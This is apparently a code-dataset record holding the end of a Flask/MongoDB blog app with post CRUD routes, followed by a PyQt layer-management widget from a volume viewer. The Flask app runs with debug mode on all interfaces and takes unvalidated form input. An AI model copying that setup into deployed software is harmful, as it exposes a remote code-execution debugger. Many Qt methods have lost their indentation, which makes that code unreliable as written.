        return render_template("create-post.html", homeIsActive=False, createPostIsActive=True)
    elif(request.method == "POST"):
        title = request.form['title']
        author = request.form['author']
        # NOTE(review): naive local time -- consider datetime.utcnow() for
        # consistent ordering across hosts.
        createdAt = datetime.now()
        # save the record to the database
        db.posts.insert_one({"title": title, "author": author, "createdAt": createdAt})
        # redirect to home page
        return redirect("/")
@app.route('/edit-post', methods=['GET', 'POST'])
def editPost():
    """GET: show the edit form for one post; POST: apply the submitted edit."""
    if request.method == "GET":
        # get the id of the post to edit
        # NOTE(review): the query parameter is named 'form' -- presumably it
        # carries the post id; verify against the linking template.
        postId = request.args.get('form')
        # get the post details from the db
        post = dict(db.posts.find_one({"_id":ObjectId(postId)}))
        # direct to edit post page
        return render_template('edit-post.html', post=post)
    elif request.method == "POST":
        #get the data of the post
        postId = request.form['_id']
        title = request.form['title']
        author = request.form['author']
        # update the data in the db
        db.posts.update_one({"_id":ObjectId(postId)},{"$set":{"title":title,"author":author}})
        # redirect to home page
        return redirect("/")
@app.route('/delete-post', methods=['POST'])
def deletePost():
    """Delete the post whose _id was submitted in the form, then go home."""
    # get the id of the post to delete
    postId = request.form['_id']
    # delete from the database
    db.posts.delete_one({ "_id": ObjectId(postId)})
    # redirect to home page
    return redirect("/")


if __name__ == "__main__":
    # Listen on all interfaces; debug mode is for development only.
    app.run(host="0.0.0.0", port="5001", debug=True)
| StarcoderdataPython |
3237911 | <reponame>mpi2/vpv
import numpy as np
from PyQt5 import QtGui, QtCore
from PyQt5.QtWidgets import QDialog
import pyqtgraph as pg
from vpv.lib.qrangeslider import QRangeSlider
from vpv.utils.lookup_tables import Lut
from vpv.ui.views.ui_datatab import Ui_data
from vpv.ui.views.ui_change_vol_name import Ui_VolNameDialog
import copy
from vpv.common import Orientation, Layers
from functools import partial
"""
The Qt widget that controls the currently viewed volumes, heatmaps, and vector volumes. Accessed from the main
dock widget
"""
DEFAULT_SCALE_BAR_SIZE = 14.0
class VolNameDialog(QDialog):
    """Small modal dialog for renaming a loaded volume.

    Emits ``name_changed_signal(old_name, new_name)`` when OK is pressed;
    Cancel simply closes the dialog.
    """
    name_changed_signal = QtCore.pyqtSignal(str, str)

    def __init__(self, parent, current_name):
        super(VolNameDialog, self).__init__(parent)
        # Copy so the original string is preserved while the user edits.
        self.current_name = copy.copy(current_name)
        self.ui = Ui_VolNameDialog()
        self.ui.setupUi(self)
        self.setWindowTitle('Edit volume name')
        self.ui.lineEditVolName.setText(current_name)
        self.ui.pushButtonOk.clicked.connect(self.on_ok)
        self.ui.pushButtonCancel.clicked.connect(self.on_cancel)

    def on_ok(self):
        # Emit old and new names so the controller can apply the rename.
        new_name = self.ui.lineEditVolName.text()
        self.name_changed_signal.emit(self.current_name, new_name)
        self.close()

    def on_cancel(self):
        self.close()
class ManageData(QtGui.QWidget):
data_processing_signal = QtCore.pyqtSignal()
data_processing_finished_signal = QtCore.pyqtSignal()
roi_signal = QtCore.pyqtSignal(list, list, list)
ui_changed_signal = QtCore.pyqtSignal()
scale_bar_color_signal = QtCore.pyqtSignal(QtGui.QColor)
gradient_editor_signal = QtCore.pyqtSignal()
load_metadata_signal = QtCore.pyqtSignal()
def __init__(self, controller, model, mainwindow, appdata):
super(ManageData, self).__init__(mainwindow)
self.ui = Ui_data()
self.ui.setupUi(self)
self.views = controller.views
self.mainwindow = mainwindow
self.appdata = appdata
lut = Lut()
self.controller = controller # run_vpv.py
self.hotred = lut._hot_red_blue()[0]
self.hotblue = lut._hot_red_blue()[1]
self.model = model
self.volume_ids = None
self.luts = Lut()
self.ui.labelFdrThresholds.hide()
self._link_views = True
self.ui.checkBoxLinkViews.setChecked(True)
self.vector_mag_slider = QRangeSlider((0, 0, 0))
# Just need one handle, so hide the minimum handle
self.vector_mag_slider.head.setDisabled(True)
self.ui.horizontalLayoutMagnitudeSlider.insertWidget(1, self.vector_mag_slider)
self.vector_mag_slider.setMin(0)
self.vector_mag_slider.setMax(10.0)
self.vector_mag_slider.setStart(0)
self.vector_mag_slider.setEnd(10.0)
# The lower volume levels slider and Combo boxes
self.volume_levels_slider = QRangeSlider((255, 255, 255))
self.ui.horizontalLayoutVol1Levels.insertWidget(1, self.volume_levels_slider)
# upper volume levels slider and comboboxes
self.volume_levels_slider2 = QRangeSlider((255, 255, 255))
self.ui.horizontalLayoutVol2Levels.insertWidget(1, self.volume_levels_slider2)
# data sliders
self.data_levels_positive_slider = QRangeSlider((0, 255, 0))
pos_bg = 'background: qlineargradient(x1: 0.2, x2: 1,stop: 0 #FFFFFF, stop: 1 #FF0000);'
self.data_levels_positive_slider.handle.setStyleSheet(pos_bg)
self.ui.horizontalLayoutDataSliders.insertWidget(1, self.data_levels_positive_slider)
self.data_levels_negative_slider = QRangeSlider((0, 255, 0))
neg_bg = 'background: qlineargradient(x1: 0.2, x2: 1,stop: 0 #0000FF, stop: 1 #FFFFFF);'
self.data_levels_negative_slider.handle.setStyleSheet(neg_bg)
self.ui.horizontalLayoutDataSliders.insertWidget(0, self.data_levels_negative_slider)
self.ui.pushButtonManagerGrey.hide()
self.ui.pushButtonManagerCyan.hide()
self.ui.pushButtonManagerOrange.hide()
self.six_views_visible = False
self.ui.checkBox6Views.setChecked(False)
self.blob_table = QtGui.QTableWidget(self)
self.ui.verticalLayoutConnectedComponents.addWidget(self.blob_table, 0)
self.blob_table.setColumnCount(3)
self.blob_table.setHorizontalHeaderLabels(['Count', 'Mean', 'location'])
self.ui.doubleSpinBoxVoxelSize.setMaximum(1000.0)
self.ui.doubleSpinBoxVoxelSize.setValue(DEFAULT_SCALE_BAR_SIZE)
self.ui.doubleSpinBoxVoxelSize.setKeyboardTracking(False)
self.ui.doubleSpinBoxVoxelSize.valueChanged.connect(self.set_voxel_size)
self.ui.doubleSpinBoxScaleBarLength.setMaximum(10000)
self.ui.doubleSpinBoxScaleBarLength.setValue(1000)
self.ui.doubleSpinBoxScaleBarLength.setKeyboardTracking(False)
self.colour_bar = ColorScaleBar(self.ui.verticalLayoutColorScale, self.hotblue, self.hotred)
self.ui.vol2ControlsWidget.hide()
self.ui.vectorWidget.hide()
self.ui.dataWidget.hide()
self.ui.doubleSpinBoxNegThresh.setMaximum(0)
self.ui.doubleSpinBoxNegThresh.setMinimum(-100)
self.ui.doubleSpinBoxNegThresh.setSingleStep(0.1)
self.ui.doubleSpinBoxPosThresh.setSingleStep(0.1)
self.ui.doubleSpinBoxVol2Opacity.setRange(0.0, 1.0)
self.ui.doubleSpinBoxVol2Opacity.setSingleStep(0.1)
self.ui.doubleSpinBoxVol2Opacity.setValue(1.0)
self.ui.pushButtonLoadAtlasMeta.clicked.connect(self.load_atlas_meta_slot)
self.connect_signal_slots()
def load_atlas_meta_slot(self):
self.load_metadata_signal.emit()
def connect_signal_slots(self):
self.ui.pushButtonRecalcConnectComponents.clicked.connect(self.controller.recalc_connected_components)
self.ui.comboBoxVolume.activated['QString'].connect(partial(self.modify_layer, Layers.vol1, 'set_volume'))
self.ui.checkBoxVisibilityVol2.clicked.connect(partial(self.modify_layer, Layers.vol2, 'set_visibility'))
self.ui.checkBoxVisibilityHeatmap.clicked.connect(partial(self.modify_layer, Layers.heatmap, 'set_visibility'))
self.ui.checkBoxLinkViews.clicked.connect(self.on_link_views)
self.ui.comboBoxOrientation.activated['QString'].connect(self.on_orientation)
self.ui.pushButtonScreenShot.clicked.connect(self.controller.take_screen_shot)
self.ui.pushButtonVectorMagnitudeFilter.pressed.connect(self.lower_magnitude_changed)
self.volume_levels_slider.startValueChanged.connect(self.lower_level_volume_changed)
self.volume_levels_slider.endValueChanged.connect(self.upper_level_volume_changed)
self.ui.comboBoxVolumeLut.activated['QString'].connect(self.on_vol_lut_changed)
self.volume_levels_slider2.startValueChanged.connect(self.lower_level_volume2_changed)
self.volume_levels_slider2.endValueChanged.connect(self.upper_level_volume2_changed)
self.ui.comboBoxVolume2.activated['QString'].connect(self.volume2_changed)
self.ui.comboBoxVolumeLut2.activated['QString'].connect(self.on_vol2_lut_changed)
self.ui.comboBoxLutHeatmap.activated['QString'].connect(self.on_heatmap_lut_changed)
self.ui.comboBoxData.activated['QString'].connect(self.data_changed)
# connect the levels slider to the model
self.data_levels_negative_slider.startValueChanged.connect(self.data_negative_lower_changed)
self.data_levels_negative_slider.endValueChanged.connect(self.data_negative_higher_changed)
self.data_levels_positive_slider.startValueChanged.connect(self.data_positive_lower_changed)
self.data_levels_positive_slider.endValueChanged.connect(self.data_positive_higher_changed)
self.ui.pushButtonManagerRed.clicked.connect(self.showRedViewManagerSlot)
self.ui.pushButtonManagerBlue.clicked.connect(self.showBlueViewManagerSlot)
self.ui.pushButtonManagerGreen.clicked.connect(self.showGreenViewManagerSlot)
self.ui.pushButtonManagerOrange.clicked.connect(self.showOrangeViewManagerSlot)
self.ui.pushButtonManagerGrey.clicked.connect(self.showYellowViewManagerSlot)
self.ui.pushButtonManagerCyan.clicked.connect(self.showCyanViewManagerSlot)
self.ui.checkBoxLeftView.clicked.connect(self.left_view_visibility)
self.ui.checkBoxCentralView.clicked.connect(self.central_view_visibility)
self.ui.checkBoxRightView.clicked.connect(self.right_view_visibility)
# connect the vector controls
self.ui.comboBoxVectors.activated['QString'].connect(self.vector_changed)
self.ui.spinBoxVectorScale.valueChanged['QString'].connect(self.vector_scale_changed)
self.ui.spinBoxVectorSubsampling.valueChanged.connect(self.vector_subsampling_changed)
self.ui.pushButtonVectorColor.pressed.connect(self.vector_change_color)
self.blob_table.cellClicked.connect(self.on_connected_table_clicked)
self.ui.doubleSpinBoxScaleBarLength.valueChanged.connect(self.set_scalebar_length)
self.ui.checkBoxShowVol2Controls.clicked.connect(self.vol2_controls_visibility)
self.ui.checkBoxShowVectorControls.clicked.connect(self.vector_controls_visibility)
self.ui.checkBoxShowDataControls.clicked.connect(self.data_controls_visibility)
self.ui.pushButtonEditVolName.clicked.connect(self.on_change_vol_name)
self.ui.pushButtonScaleBarColor.clicked.connect(self.on_scalebar_color)
self.ui.doubleSpinBoxNegThresh.valueChanged.connect(self.on_neg_thresh_spin)
self.ui.checkBox6Views.clicked.connect(self.show2Rows)
self.ui.doubleSpinBoxPosThresh.valueChanged.connect(self.on_pos_thresh_spin)
self.ui.checkBoxScaleBarLabel.clicked.connect(self.on_scalebar_label_checked)
self.ui.doubleSpinBoxVol2Opacity.valueChanged.connect(partial(self.modify_layer, Layers.vol2, 'set_opacity'))
    def on_scalebar_label_checked(self, checked):
        """Slot: toggle the scale-bar text label on every slice view."""
        for view in self.views.values():
            view.scale_bar_visible = checked

    def activate_tab(self):
        # Placeholder: nothing to do when this tab becomes active.
        pass

    def on_neg_thresh_spin(self, value):
        """Slot: negative-threshold spinbox moved -> move the slider end."""
        self.data_levels_negative_slider.setEnd(value)

    def on_pos_thresh_spin(self, value):
        """Slot: positive-threshold spinbox moved -> move the slider start."""
        self.data_levels_positive_slider.setStart(value)
def on_pos_lut(self):
print('gradient in dm')
self.gradient_editor_signal.emit() # called 5/6 times on one click
    def on_scalebar_color(self):
        """Slot: open a color dialog and broadcast the chosen scale-bar color."""
        color = QtGui.QColorDialog.getColor()
        self.scale_bar_color_signal.emit(color)
    def on_change_vol_name(self):
        """Slot: open a rename dialog for the current first-layer volume."""
        vol = self.controller.current_view.layers[Layers.vol1].vol
        if vol:
            dlg = VolNameDialog(self, vol.name)
            dlg.name_changed_signal.connect(self.change_vol_name)
            dlg.show()
    def change_vol_name(self, current_name, new_name):
        """Rename a volume in the model and refresh all views.

        No-op if the first layer has no volume or the new name is empty.
        """
        vol = self.controller.current_view.layers[Layers.vol1].vol
        if vol and new_name:
            self.controller.model.change_vol_name(current_name, new_name)
            self.controller.update_slice_views()
            self.update()
# def mouse_pressed(self, view_index, x, y, orientation, vol_id):
# self.annotations.mouse_pressed_annotate(view_index, x, y, orientation, vol_id)
    def data_controls_visibility(self, checked):
        """Slot: show/hide the data (heatmap) control panel."""
        if checked:
            self.ui.dataWidget.show()
        else:
            self.ui.dataWidget.hide()

    def vector_controls_visibility(self, checked):
        """Slot: show/hide the vector-field control panel."""
        if checked:
            self.ui.vectorWidget.show()
        else:
            self.ui.vectorWidget.hide()

    def vol2_controls_visibility(self, checked):
        """Slot: show/hide the second-volume-overlay control panel."""
        if checked:
            self.ui.vol2ControlsWidget.show()
        else:
            self.ui.vol2ControlsWidget.hide()
    def show_color_scale_bars(self, isvisible=True):
        """
        Show or hide the colour scale bar figure.

        Does nothing when no heatmap volume is loaded (the bar would be
        meaningless). A bit of a mess at the moment; will tidy up.
        """
        if not self.controller.current_view.layers[Layers.heatmap].vol:
            return
        if not isvisible:
            self.colour_bar.hide()
            return
        else:
            self.colour_bar.show()
    def set_scalebar_length(self, length):
        """Propagate a new scale-bar length to every slice view."""
        for view in self.views.values():
            view.set_scalebar_size(length)

    def set_voxel_size(self, voxel_size):
        """Propagate a new voxel size to every slice view."""
        for view in self.views.values():
            view.set_voxel_size(voxel_size)
def lower_magnitude_changed(self):
value = self.vector_mag_slider.getRange()[0]
if not self.link_views:
self.current_slice_view.layers[Layers.vectors].set_magnitude_cutoff(value, 10.0)
else:
for view in self.views.values():
view.layers[Layers.heatmap].set_magnitude_cutoff(value, 10.0)
#self.update_slice_views()
def vector_subsampling_changed(self, value):
if self.link_views:
for view in self.views.values():
view.layers[Layers.vectors].set_subsampling(value)
else:
self.controller.current_view.layers[Layers.vectors].set_subsampling(value)
def vector_scale_changed(self, value):
if self.link_views:
for view in self.views.values():
view.layers[Layers.vectors].set_scale(value)
else:
self.controller.current_view.layers[Layers.vectors].set_scale(value)
    def vector_change_color(self):
        """Slot: pick a new arrow color for the vector layer via a dialog."""
        col = QtGui.QColorDialog.getColor()
        if col.isValid():  # dialog not cancelled
            self.modify_layer(Layers.vectors, 'set_arrow_color', col)
    # One thin slot per colour-coded manager button; each simply selects
    # the corresponding slice view (indices 0-5).
    def showRedViewManagerSlot(self):
        self.switch_selected_view(0)

    def showBlueViewManagerSlot(self):
        self.switch_selected_view(1)

    def showGreenViewManagerSlot(self):
        self.switch_selected_view(2)

    def showOrangeViewManagerSlot(self):
        self.switch_selected_view(3)

    def showYellowViewManagerSlot(self):
        self.switch_selected_view(4)

    def showCyanViewManagerSlot(self):
        self.switch_selected_view(5)
    def on_fdr_button_clicked(self, t):
        """
        Upon clicking the FDR threshold button the signal with the
        corresponding t value arrives here.
        Set the threshold on the current Heatmap volume.

        Parameters
        ----------
        t: float
            the t-statistic
        """
        self.modify_layer(Layers.heatmap, 'set_t_threshold', t)
    def volume_changed(self, vol_name):
        """Slot: first-volume combobox changed -> load that volume in vol1."""
        self.modify_layer(Layers.vol1, 'set_volume', vol_name)

    def volume2_changed(self, vol_name):
        """Slot: second-volume combobox changed -> load that volume in vol2."""
        self.modify_layer(Layers.vol2, 'set_volume', vol_name)

    def data_changed(self, vol_name):
        """Slot: data combobox changed -> swap the heatmap volume and
        refresh the connected-component table."""
        self.modify_layer(Layers.heatmap, 'set_volume', vol_name)
        self.update_connected_components(vol_name)
    def update_connected_components(self, vol_name):
        """Rebuild the connected-component table for the named data volume.

        Each row shows (voxel count, mean value, bounding-box string).
        The table is cleared when 'None' is selected.
        """
        self.blob_table.clear()
        self.blob_table.setRowCount(0)  # clear
        self.blob_table.setHorizontalHeaderLabels(['Count', 'Mean', 'location x:x, y:y, z:z'])
        # set the connected component list
        if vol_name != 'None':
            # connected_components maps (size, mean) -> bounding box
            conn = self.model.getdata(vol_name).connected_components
            for i, (size_mean, bbox) in enumerate(conn.items()):
                self.blob_table.insertRow(i)
                bbox_string = ', '.join(str(x) for x in bbox)
                self.blob_table.setItem(i, 0, QtGui.QTableWidgetItem(str(size_mean[0])))
                self.blob_table.setItem(i, 1, QtGui.QTableWidgetItem(str(size_mean[1])))
                self.blob_table.setItem(i, 2, QtGui.QTableWidgetItem(bbox_string))
            self.blob_table.resizeColumnsToContents()
    def on_connected_table_clicked(self, row, _):
        """Slot: a component row was clicked -> emit its ROI so the views
        can jump to it. Column 2 holds 'x1, x2, y1, y2, z1, z2'."""
        roi_widget = self.blob_table.item(row, 2)
        roi_str = roi_widget.text()
        roi = [x.strip() for x in roi_str.split(', ')]
        self.roi_signal.emit(roi[0:2], roi[2:4], roi[4:6])

    def vector_changed(self, vol_name):
        """Slot: vector combobox changed -> load that vector volume."""
        self.modify_layer(Layers.vectors, 'set_volume', vol_name)
def switch_selected_view(self, slice_id):
"""
update the slice manager with data from a slice view
:param slice_id: Id of the SliceWidget that this current widget was activated from
"""
self.ui.pushButtonManagerRed.setStyleSheet("background-color: #FFDEDE")
self.ui.pushButtonManagerBlue.setStyleSheet("background-color: #D2C9FF")
self.ui.pushButtonManagerGreen.setStyleSheet("background-color: #C9FFCB")
self.ui.pushButtonManagerOrange.setStyleSheet("background-color: #FFF3A6")
self.ui.pushButtonManagerGrey.setStyleSheet("background-color: #FFFFFF")
self.ui.pushButtonManagerCyan.setStyleSheet("background-color: #ABFFFE")
if slice_id == 0:
self.ui.pushButtonManagerRed.setStyleSheet("background-color: red")
elif slice_id == 1:
self.ui.pushButtonManagerBlue.setStyleSheet("background-color: blue")
elif slice_id == 2:
self.ui.pushButtonManagerGreen.setStyleSheet("background-color: green")
elif slice_id == 3:
self.ui.pushButtonManagerOrange.setStyleSheet("background-color: orange")
elif slice_id == 4:
self.ui.pushButtonManagerGrey.setStyleSheet("background-color: grey")
elif slice_id == 5:
self.ui.pushButtonManagerCyan.setStyleSheet("background-color: cyan")
self.controller.set_current_view(slice_id)
self.update()
self.show()
    def update(self):
        """
        Update the view manager for the current Slice view.
        Called when viewing a new orthogonal view.

        NOTE(review): this shadows QWidget.update if the class derives
        from a Qt widget -- confirm that is intentional.
        """
        self.populate_volume_controls()
        self.populate_heatmap_controls()
        self.populate_vector_controls()

    def refresh_data_comboboxes(self):
        """Refill the volume/heatmap comboboxes and refresh annotations,
        e.g. after data has been added or removed from the model."""
        self.populate_volume_controls()
        self.populate_heatmap_controls()
        self.annotations.update()
    def populate_heatmap_controls(self):
        """Refill the data combobox, orientation combobox and heatmap-LUT
        combobox, then sync the widgets with the current view."""
        self.ui.comboBoxData.clear()
        self.ui.comboBoxData.addItems(self.model.data_id_list())
        self.ui.comboBoxData.addItem("None")
        self.ui.comboBoxOrientation.setCurrentIndex(self.ui.comboBoxOrientation.findText(
            self.controller.current_orientation().name))
        self.ui.comboBoxLutHeatmap.clear()
        self.ui.comboBoxLutHeatmap.addItems(self.luts.heatmap_lut_list())
        # self.update_connected_components() TODO: how signal update
        self.update_data_controls()
def clear_layout(self, layout):
if layout is not None:
while layout.count():
item = layout.takeAt(0)
widget = item.widget()
if widget is not None:
widget.deleteLater()
else:
self.clear_layout(item.layout())
    def update_fdr_buttons(self):
        """
        When the heatmap volume has been changed, check for the presence of
        a q->t threshold mapping dict and rebuild the FDR buttons if present.
        Non-numeric t values are skipped.
        """
        slice_layers = self.controller.current_view.layers
        heatmap_vol = slice_layers[Layers.heatmap].vol
        if not heatmap_vol:
            return
        row = 0
        col = 0
        self.clear_layout(self.ui.gridLayoutFdrButtons)
        if heatmap_vol.fdr_thresholds:
            self.ui.labelFdrThresholds.show()
            group = QtGui.QButtonGroup(self)
            for q, t in heatmap_vol.fdr_thresholds.items():
                # skip entries whose t value is not numeric
                try:
                    float(t)
                except (ValueError, TypeError):
                    continue
                button = QtGui.QPushButton(str(q))
                group.addButton(button)
                button.clicked.connect(partial(self.on_fdr_button_clicked, t))
                self.ui.gridLayoutFdrButtons.addWidget(button, row, col)
                # lay the buttons out six per row
                col += 1
                if col > 5:
                    row += 1
                    col = 0
        else:
            self.ui.labelFdrThresholds.hide()
def populate_volume_controls(self):
"""
when a new view manager is activatewd from a new slice view
:return:
"""
self.ui.comboBoxVolume.clear()
self.ui.comboBoxVolume.addItems(self.model.volume_id_list())
self.ui.comboBoxVolume.addItem("None")
# do the luts
self.ui.comboBoxVolumeLut.clear()
# Lookup table combobox
self.ui.comboBoxVolumeLut.addItems(self.luts.lut_list())
self.ui.comboBoxVolume2.clear()
self.ui.comboBoxVolume2.addItems(self.model.volume_id_list())
self.ui.comboBoxVolume2.addItem("None")
# do the luts
self.ui.comboBoxVolumeLut2.clear()
# Lookup table combobox
self.ui.comboBoxVolumeLut2.addItems(self.luts.lut_list())
self.update_volume_controls()
    def populate_vector_controls(self):
        """Refill the vector combobox and sync its widgets."""
        self.ui.comboBoxVectors.clear()
        self.ui.comboBoxVectors.addItems(self.model.vector_id_list())
        self.ui.comboBoxVectors.addItem("None")
        self.update_vector_controls()
    def update_vector_controls(self):
        """Sync the vector widgets (subsampling, scale, combobox) with the
        current view's vector volume, or select 'None' if there is none."""
        vol = self.controller.current_view.layers[Layers.vectors].vol
        if vol:
            self.ui.spinBoxVectorSubsampling.setValue(vol.subsampling)
            self.ui.spinBoxVectorScale.setValue(vol.scale)
            self.ui.comboBoxVectors.setCurrentIndex(self.ui.comboBoxVectors.findText(vol.name))
        else:
            self.ui.comboBoxVectors.setCurrentIndex( self.ui.comboBoxVectors.findText('None'))
    def update_volume_controls(self):
        """Sync the level sliders, volume comboboxes and LUT comboboxes for
        both volume layers with the current view's state."""
        slice_layers = self.controller.current_view.layers
        vol1 = slice_layers[Layers.vol1].vol
        if vol1:
            # slider range = full intensity range; handles = current levels
            min_, max_ = [round(x, 2) for x in vol1.intensity_range()]
            lower, upper = [round(x, 2) for x in vol1.levels]
            self.volume_levels_slider.setMin(min_)
            self.volume_levels_slider.setMax(max_)
            self.volume_levels_slider.setStart(lower)
            self.volume_levels_slider.setEnd(upper)
            self.volume_levels_slider.update()
            self.ui.comboBoxVolume.setCurrentIndex(
                self.ui.comboBoxVolume.findText(vol1.name))
            self.ui.comboBoxVolumeLut.setCurrentIndex(
                self.ui.comboBoxVolumeLut.findText(slice_layers[Layers.vol1].lut[1]))
        else:  # No volume
            self.ui.comboBoxVolume.setCurrentIndex(self.ui.comboBoxVolume.findText('None'))
        vol2 = slice_layers[Layers.vol2].vol
        if vol2:
            min_, max_ = [round(x, 2) for x in vol2.intensity_range()]
            lower, upper = [round(x, 2) for x in vol2.levels]
            self.volume_levels_slider2.setMin(min_)
            self.volume_levels_slider2.setMax(max_)
            self.volume_levels_slider2.setStart(lower)
            self.volume_levels_slider2.setEnd(upper)
            self.volume_levels_slider2.update()
            self.ui.comboBoxVolume2.setCurrentIndex(self.ui.comboBoxVolume2.findText(vol2.name))
            self.ui.comboBoxVolumeLut2.setCurrentIndex(
                self.ui.comboBoxVolumeLut2.findText(slice_layers[Layers.vol2].lut[1]))
        else:  # No second volume overlay
            self.ui.comboBoxVolume2.setCurrentIndex(self.ui.comboBoxVolume2.findText('None'))
    def update_color_scale_bar(self):
        """Refresh the colour scale bar with the heatmap's current levels.

        NOTE(review): the argument order here is (pos_upper, pos_lower,
        neg_upper, neg_lower) but ColorScaleBar.update names them
        (max_pos, min_neg, min_pos, max_neg) -- confirm which is intended.
        """
        vol = self.controller.current_view.layers[Layers.heatmap].vol
        if vol:
            neg_lower, neg_upper = [round(x, 2) for x in vol.neg_levels]
            pos_lower, pos_upper = [round(x, 2) for x in vol.pos_levels]
            self.colour_bar.update(pos_upper, pos_lower, neg_upper,neg_lower)
    def update_data_controls(self):
        """Sync the heatmap widgets (level sliders, threshold spinboxes,
        FDR buttons, colour bar) with the current heatmap volume."""
        vol = self.controller.current_view.layers[Layers.heatmap].vol
        self.update_fdr_buttons()
        if vol:
            min_, max_ = [round(x, 2) for x in vol.intensity_range()]
            neg_min_nonzero, pos_min_nonzero = vol.non_zero_mins
            neg_lower, neg_upper = [round(x, 2) for x in vol.neg_levels]
            pos_lower, pos_upper = [round(x, 2) for x in vol.pos_levels]
            # if there are no values for negative or positive stats, we need
            # to inactivate the respective sliders as we can't have sliders
            # with min=0 and max=0
            self.ui.comboBoxData.setCurrentIndex(self.ui.comboBoxData.findText(vol.name))
            try:
                if pos_upper > 0.0:
                    self.data_levels_positive_slider.setEnabled(True)
                    self.data_levels_positive_slider.setMin(pos_min_nonzero)
                    self.data_levels_positive_slider.setMax(max_)
                    self.data_levels_positive_slider.setStart(pos_lower)
                    self.data_levels_positive_slider.setEnd(pos_upper)
                    self.data_levels_positive_slider.update()
                    pos_bg = 'background: qlineargradient(x1: 0, x2: 1,stop: 0 #222222, stop: 0.5 #FF0000, stop: 1.0 #FFFFFF );'
                    self.data_levels_positive_slider.handle.setStyleSheet(pos_bg)
                else:  # no positive values, set to grey
                    self.data_levels_positive_slider.setEnabled(False)
                    pos_bg = 'background: qlineargradient(x1: 0.2, x2: 1,stop: 0 #ADADAD, stop: 1 #ADADAD);'
                    self.data_levels_positive_slider.handle.setStyleSheet(pos_bg)
                if neg_lower < 0.0:
                    self.data_levels_negative_slider.setEnabled(True)
                    self.data_levels_negative_slider.setMin(min_)
                    self.data_levels_negative_slider.setMax(neg_min_nonzero)
                    self.data_levels_negative_slider.setStart(neg_lower)
                    self.data_levels_negative_slider.setEnd(neg_upper)
                    self.data_levels_negative_slider.update()
                    neg_bg = 'background: qlineargradient(x1: 0, x2: 1,stop: 0 #FFFFFF, stop: 0.5 #0000FF, stop: 1 #222222);'
                    self.data_levels_negative_slider.handle.setStyleSheet(neg_bg)
                else:  # no negative values, set to grey
                    self.data_levels_negative_slider.setEnabled(False)
                    neg_bg = 'background: qlineargradient(x1: 0.2, x2: 1,stop: 0 #ADADAD, stop: 1 #ADADAD);'
                    self.data_levels_negative_slider.handle.setStyleSheet(neg_bg)
            except TypeError:
                # The slider is raising a type error. Not sure why at the moment
                print('Slider error')
            self.update_color_scale_bar()
            self.ui.doubleSpinBoxNegThresh.setValue(neg_upper)
            self.ui.doubleSpinBoxPosThresh.setValue(pos_lower)
        else:
            self.ui.comboBoxData.setCurrentIndex(self.ui.comboBoxData.findText('None'))
    def modify_layer(self, layer_idx: Layers, method: str, *args):
        """
        Instead of replicating all the layer functions here, look up the
        method to call on the layer(s) by name with getattr.

        Applies to every view when views are linked, otherwise only to the
        current view, then refreshes the slice views and all control panels.

        Parameters
        ----------
        layer_idx
            The enum specifying which layer to target
        method
            The method in the Layer subclasses to call
        args
            Any arguments to pass on
        """
        if self.link_views:
            for view in self.views.values():
                getattr(view.layers[layer_idx], method)(*args)
        else:
            getattr(self.controller.current_view.layers[layer_idx], method)(*args)
        self.update_slice_views()
        self.update_volume_controls()
        self.update_data_controls()
        self.update_vector_controls()
    def lower_level_volume_changed(self, value):
        """Slot: first-volume level slider lower handle moved.

        NOTE(review): unlike upper_level_volume2_changed there is no guard
        against a missing volume -- confirm vol1 can never be None here.
        """
        self.controller.current_view.layers[Layers.vol1].vol.set_lower_level(value)
        self.update_slice_views()

    def upper_level_volume_changed(self, value):
        """Slot: first-volume level slider upper handle moved."""
        self.controller.current_view.layers[Layers.vol1].vol.set_upper_level(value)
        self.update_slice_views()
def lower_level_volume2_changed(self, value):
self.controller.current_view.layers[Layers.vol2].vol.set_lower_level(value)
self.update_slice_views()
    def upper_level_volume2_changed(self, value):
        """Slot: second-volume level slider upper handle moved.
        No-op on the volume when no overlay is loaded."""
        if self.controller.current_view.layers[Layers.vol2].vol:
            self.controller.current_view.layers[Layers.vol2].vol.set_upper_level(value)
        self.update_slice_views()
def update_data_lut(self, which, value):
vol = self.controller.current_view.layers[Layers.heatmap].vol
if vol:
if which == 'neg_lower':
vol.set_lower_negative_lut(value)
elif which == 'neg_upper':
vol.set_upper_negative_lut(value)
elif which == 'pos_lower':
vol.set_lower_positive_lut(value)
elif which == 'pos_upper':
vol.set_upper_positive_lut(value)
self.update_slice_views()
    # Four thin slots wired to the data-level slider handles; each updates
    # one LUT limit, and the two "inner" handles also echo their value
    # into the matching threshold spinbox.
    def data_negative_lower_changed(self, value):
        self.update_data_lut('neg_lower', value)

    def data_negative_higher_changed(self, value):
        self.update_data_lut('neg_upper', value)
        self.ui.doubleSpinBoxNegThresh.setValue(value)

    def data_positive_lower_changed(self, value):
        self.update_data_lut('pos_lower', value)
        self.ui.doubleSpinBoxPosThresh.setValue(value)

    def data_positive_higher_changed(self, value):
        self.update_data_lut('pos_upper', value)
# def modify_tstat_lut(self, index, value):
# self.update_slice_views()
    def on_vol_lut_changed(self, lut_name):
        """Slot: first-volume LUT combobox changed."""
        self.modify_layer(Layers.vol1, 'set_lut', lut_name)

    def on_vol2_lut_changed(self, lut_name):
        """Slot: second-volume LUT combobox changed."""
        self.modify_layer(Layers.vol2, 'set_lut', lut_name)
def on_heatmap_lut_changed(self, lut_name):
"""
The heatmap LUT is stored on the volume not on the layer
Parameters
----------
lut_name str:
the name of the LUT
"""
vol = self.controller.current_view.layers[Layers.heatmap].vol
vol.set_lut(lut_name)
self.update_slice_views()
    def update_slice_views(self):
        """Refresh the colour scale bar and redraw every slice view."""
        self.update_color_scale_bar()
        for view in self.views.values():
            view.update_view()
    def clear(self):
        """Empty the connected-component table."""
        self.blob_table.clear()

    def set_current_sliceview(self, slice_id):
        """Remember which slice view is current, by id."""
        self.current_slice_view = self.model.slice_views[slice_id]

    def on_link_views(self, checked):
        """Slot: 'link views' checkbox toggled."""
        self.link_views = checked
    @property
    def link_views(self):
        # True when edits should be applied to all views at once.
        return self._link_views

    @link_views.setter
    def link_views(self, checked):
        # Keep the checkbox widget in step with the stored flag.
        self._link_views = checked
        self.ui.checkBoxLinkViews.setChecked(checked)
def left_view_visibility(self, checked):
if checked:
self.views[0].show()
if self.six_views_visible:
self.views[3].show()
else:
self.views[0].hide()
if self.six_views_visible:
self.views[3].hide()
def central_view_visibility(self, checked):
if checked:
self.views[1].show()
if self.six_views_visible:
self.views[4].show()
else:
self.views[1].hide()
if self.six_views_visible:
self.views[4].hide()
def right_view_visibility(self, checked):
if checked:
self.views[2].show()
if self.six_views_visible:
self.views[5].show()
